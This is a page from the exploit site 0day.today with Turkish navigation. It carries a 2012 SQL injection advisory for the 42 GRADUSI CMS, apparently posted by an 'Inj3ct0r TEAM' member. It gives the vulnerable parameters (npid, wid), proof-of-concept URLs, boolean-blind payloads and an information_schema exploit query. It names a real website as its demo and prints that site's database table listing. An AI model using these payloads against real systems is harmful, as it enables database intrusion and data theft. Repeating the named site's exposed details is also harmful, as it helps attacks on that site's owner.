0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
42gradusi - SQL injection Vulnerability
Title: ====== 42gradusi - SQL injection Vulnerability Date: ===== 2012-06-20 ======= I'm cheki Member From Inj3ct0r TEAM ======= Introduction: ============= 42 GRADUSI developed a unique capability product for Georgia digital narket- 42 CMS, Content Management System that helps our clients to keep their websites in control. Currently it works for sites operating on both PHP and FLASH platforms. Vendor Homepage: http://www.42gradusi.com/ Report-Timeline: ================ 2012-06-20 Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] npid AND wid PoC: http://<TARGET>/?action=news&lang=geo&npid=[SQL] http://<TARGET>/?action=info&wid=[SQL] Risk: The security risk of the sql injection vulnerability is estimated as high. Server information: web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.9 ===== Payload: wid=867 AND 7656=7656 Payload: npid=235 AND 2982=2982 ===== Exploit: http://<TARGET>:80/?action=news&lang=geo&npid=-235+SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='db_name'--+ ======================================== Demo:www.worksale.ge Place: POST Parameter: wid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: wid=867 AND 7656=7656 Database: worksale [20 tables] +----------------------+ | content | | content_types | | link | | menu | | module_news | | module_tenders | | redirect | | users | | users_types | | worksale | | worksale_category | | worksale_color | | worksale_erteuli | | worksale_momsaxureba | | worksale_qveknebi | | worksale_ra | | worksale_rent | | worksale_sacvavi | | worksale_users | | worksale_valuta | +----------------------+ =========================================== - Special Thanks: 1337day - Inj3ct0r TEAM AND Anuka Bolqvadze # 0day.today [2024-07-04] #